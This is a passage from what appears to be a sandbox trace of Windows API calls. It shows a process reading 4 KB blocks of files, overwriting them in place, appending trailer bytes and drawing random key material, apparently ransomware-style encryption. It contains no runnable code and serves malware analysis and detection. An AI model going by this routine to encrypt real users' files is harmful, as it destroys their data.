lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.068] SetFilePointerEx (in: hFile=0x8ac, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.068] WriteFile (in: hFile=0x8ac, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.068] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.068] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.069] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.069] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.070] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.070] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.071] GetProcessHeap () returned 0x4f10000 [0082.071] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.072] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.072] GetProcessHeap () returned 0x4f10000 [0082.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.073] SetFilePointerEx (in: hFile=0x8ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.073] WriteFile (in: hFile=0x8ac, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.073] WriteFile (in: hFile=0x8ac, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.073] GetProcessHeap () returned 0x4f10000 [0082.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.073] GetProcessHeap () returned 0x4f10000 [0082.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.073] GetProcessHeap () returned 0x4f10000 [0082.073] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.073] CloseHandle (hObject=0x8ac) returned 1 [0082.074] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 76 [0082.075] SetFilePointerEx (in: hFile=0x8b0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.075] ReadFile (in: hFile=0x8b0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.075] SetFilePointerEx (in: hFile=0x8b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.075] GetProcessHeap () returned 0x4f10000 [0082.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.075] GetProcessHeap () returned 0x4f10000 [0082.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.075] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.075] GetProcessHeap () returned 0x4f10000 [0082.075] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.075] ReadFile (in: hFile=0x8b0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.122] SetFilePointerEx (in: hFile=0x8b0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.122] WriteFile (in: hFile=0x8b0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.122] GetProcessHeap () returned 0x4f10000 [0082.122] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.123] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.123] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.124] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.124] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.125] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.125] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.126] GetProcessHeap () returned 0x4f10000 [0082.126] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: 